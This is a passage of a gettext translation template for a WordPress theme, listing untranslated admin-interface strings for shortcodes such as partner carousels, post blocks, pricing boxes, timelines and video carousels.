msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:107 msgid "Choose color for button." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:114 msgid "Choose color for button when hover." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:121 msgid "Choose background color for button." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:128 msgid "Choose background color for button when hover." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:135 msgid "Choose border color for button." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:142 msgid "Choose border color for button when hover." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/config.php:9 msgid "SLZ Partner" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/config.php:10 msgid "List of partner" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:8 msgid "Six" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:9 msgid "Seven" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:10 msgid "Eight" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:44 msgid "Choose slide for shortcode." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:60 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:73 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:86 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:99 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:111 msgid "Carousel Custom" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:120 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:402 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:314 msgid "Slide Arrow Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:123 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:405 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:317 msgid "Choose color slide arrow for slide." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:128 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:140 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:152 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:164 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:176 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:188 msgid "Color Custom" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:132 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:326 msgid "Slide Arrow Color Hover" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:135 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:417 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:329 msgid "Choose color slide arrow for slide when hover." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:144 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:426 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:338 msgid "Slide Arrow Background Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:147 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:429 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:341 msgid "Choose background color slide arrow for slide." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:156 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:350 msgid "Slide Arrow Background Color Hover" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:159 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:441 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:353 msgid "Choose background color slide arrow for slide when hover." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:168 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:450 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:362 msgid "Slide Dots Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:171 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:453 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:365 msgid "Choose color slide dots for slide." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:180 msgid "Slide Dots Color Active" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:183 msgid "Choose color slide dots for slide when active, hover." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:221 msgid "Is Padding ?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:225 msgid "Choose YES to block is padding." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:229 msgid "List of Partner" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:234 msgid "Item Title" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:237 msgid "Enter title of block" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:241 msgid "Item Image" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:243 msgid "Upload Image. Recommend uploading the pictures the same size." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:247 msgid "Item Link" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:250 msgid "Enter link of item." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:10 msgid "SLZ Posts Block" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:11 msgid "Show posts with layouts" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:45 msgid "Portsmouth" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:46 msgid "Chester" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:47 msgid "Huddersfield" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:48 msgid "Bath" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:52 msgid "Cascina" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:11 msgid "Choose main layout to show" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:12 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:21 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:34 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:47 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:60 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:73 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-2.php:12 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-2.php:21 msgid "Main Layout" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:20 msgid "Choose if want to show category" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:29 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:112 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:68 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:80 msgid "Show Top Post Info?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:33 msgid "Choose if want to show top post info" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:42 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:125 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-2.php:16 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:55 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:91 msgid "Show Bottom Post Info?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:46 msgid "Choose if want to show bottom post info" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:55 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-2.php:7 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-2.php:47 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:42 msgid "Show Excerpt?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:59 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-2.php:11 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-2.php:51 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:46 msgid "Choose if want to show excerpt" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:72 msgid "Choose if want to show read more button" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:85 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-2.php:29 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:11 msgid "Choose list layout to show" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:86 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:95 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:104 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:117 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:130 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:143 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:156 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-2.php:30 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-2.php:39 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-2.php:52 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:12 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:21 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:34 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:47 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:60 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:73 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:85 msgid "List Layout" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:94 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:20 msgid "Choose number of column." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:103 msgid "Choose if want to show category." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:116 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:72 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:87 msgid "Choose if want to show top post info." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:129 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-2.php:20 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:59 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:98 msgid "Choose if want to show bottom post info." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:142 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-2.php:38 msgid "Choose if want to show feature image" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:155 msgid "Choose if want to show read more button." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:29 msgid "Show Left and Right layout?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:33 msgid "Choose if want to show left and right layout" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:81 msgid "Show User Info?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:84 msgid "Choose if want to show user info." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-4.php:15 msgid "Arrow Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-4.php:18 msgid "Choose a custom arrow color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-4.php:27 msgid "Arrow Hover Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-4.php:30 msgid "Choose a custom arrow hover color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:26 msgid "Author Post Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:29 msgid "Choose a author post color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:34 msgid "Title Post Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:37 msgid "Choose a title post color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:58 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:134 msgid "Number Posts" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:61 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:137 msgid "" "The number of posts to display. If it blank the number posts will be the " "number from Settings -> Reading" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:65 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:141 msgid "Offset Posts" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:68 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:144 msgid "" "Enter offset to display. If you want to start on record 6, using offset 5" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:75 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:151 msgid "Choose criteria to display." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:82 msgid "Enter number of excerpt length" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:93 msgid "Enter text for button \"read more\"" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/config.php:10 msgid "SLZ Posts Carousel" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/config.php:11 msgid "Block Carousel of posts" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:12 msgid "Choose a layout to show." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:19 msgid "One Column" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:20 msgid "Two Column" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:21 msgid "Three Column" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:22 msgid "Four Column" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:25 msgid "Choose a column for display block." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:69 msgid "Show Excerpt" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:76 msgid "Show or hide post excerpt" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:105 msgid "Input number of excerpt length." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:113 msgid "Show Readmore Button" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:120 msgid "Show or hide readmore button" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:126 msgid "Add custom link for readmore buttonaa." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:168 msgid "Fade" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:217 msgid "Animation?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:220 msgid "Choose a animation" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/views/large_module.php:18 msgid "Read more" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/config.php:10 msgid "SLZ Pricing Box" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/config.php:11 msgid "Box of pricing info" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/options/layout-1.php:12 msgid "Select style for pricing box" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:39 msgid "Number of Pricing Box" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:44 msgid "Choose number of pricing box to display" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:58 #, php-format msgid "Pricing Box %s" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:70 msgid "Active?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:74 msgid "Choose yes if you want it show as active." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:80 msgid "Pricing Header Background Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:82 msgid "Choose background color for header of pricing box." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:89 msgid "Mark Label" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:92 msgid "Please input mark label." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:100 msgid "Choose label text color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:107 #: framework-customizations/theme/options/post-settings.php:363 msgid "Label Background Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:109 msgid "Choose label background color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:119 msgid "Please input box title." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:128 msgid "Choose title color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:138 msgid "Please input price number." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:145 msgid "Old Price" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:148 msgid "Please input Old price number." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:155 msgid "Price Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:157 msgid "Choose price color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:167 msgid "Enter measurement units. Example: $, GBP, EUR, etc." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:177 msgid "Please input price subfix. Exp: Month, Hour,.." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:184 msgid "Price Subfix Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:186 msgid "Choose price subfix color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:196 msgid "Please input sub title." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:205 msgid "Choose sub title color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:212 msgid "Features" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:217 msgid "Feature Item" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:221 msgid "Please input feature item." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:225 msgid "Feature Item Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:227 msgid "Choose feature item color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:242 msgid "Choose icon feature item color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:254 msgid "Please input button text." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:263 msgid "Choose button link and info." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:271 msgid "Choose button text color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:278 msgid "Button Color (hover)" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:280 msgid "Choose button text color when you mouse over it." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:289 msgid "Choose button background color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:296 msgid "Button Background Color (hover)" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:298 msgid "Choose button background color when you mouse over it." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:305 msgid "Background Color (hover)" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:307 msgid "Choose background color when you mouse over it." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:315 msgid "Background Image Hover" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:316 msgid "Upload pricing box background image hover." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:9 msgid "Conneticut" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:24 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:73 msgid "List of Progress Bar" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:37 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:86 msgid "Number show" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:41 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:90 msgid "" "Please input percent of progress bar, Exp: if you want to show 80, please " "input 80, maximum number is 100" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:45 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:94 msgid "Progress Bar Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:48 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:97 msgid "Choose a custom progress bar color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:59 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:108 msgid "Percent Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:62 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:111 msgid "Choose a custom percent text color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:115 msgid "Marker Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:118 msgid "Choose a custom marker color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/timeline/config.php:8 msgid "SLZ Timeline" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/timeline/config.php:9 msgid "Timeline of events" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:13 msgid "Choose style for shortcode" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:17 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-2.php:8 msgid "Add info to timeline" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:23 msgid "Timeline" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:25 msgid "Timeline. If it blank the will not have timeline" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:29 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-2.php:20 msgid "Timeline Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:31 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-2.php:22 msgid "Choose a custom color for timeline." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:42 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-2.php:33 msgid "Url" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:45 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-2.php:36 msgid "Please input link to timeline." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:57 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-2.php:48 msgid "Description. If it blank the will not have a description" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:63 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-2.php:54 msgid "Choose a custom color for description." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:72 msgid "Milestone Point" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:74 msgid "Choose a custom color for milestone point." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:79 msgid "Timeline Line" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:81 msgid "Choose a custom color for timeline line." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-2.php:14 msgid "Year" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-2.php:16 msgid "Year of timeline. If it blank will not have timeline." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/config.php:10 msgid "SLZ Video Carousel" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/config.php:11 msgid "Show list of video as carousel" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/config.php:26 #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:6 #: framework-customizations/theme/options/posts/post.php:104 msgid "Youtube" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/config.php:27 #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:7 #: framework-customizations/theme/options/posts/post.php:108 msgid "Vimeo" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:11 #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:59 msgid "Choose style to display." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:21 msgid "Add Title for shortcode Video Carousel" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:36 msgid "Add Video" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:41 #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:33 msgid "Video Title" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:44 msgid "Add title for video" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:48 msgid "Video Description" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:51 msgid "Add description for video" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:55 msgid "Type Of Video" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:63 #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:56 #: framework-customizations/theme/options/posts/post.php:125 msgid "Youtube ID" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:66 #: framework-customizations/theme/options/posts/post.php:126 msgid "" "Example the Video ID for http://www.youtube.com/v/8OBfr46Y0cQ is 8OBfr46Y0cQ" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:74 #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:69 #: framework-customizations/theme/options/posts/post.php:117 msgid "Vimeo ID" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:77 #: 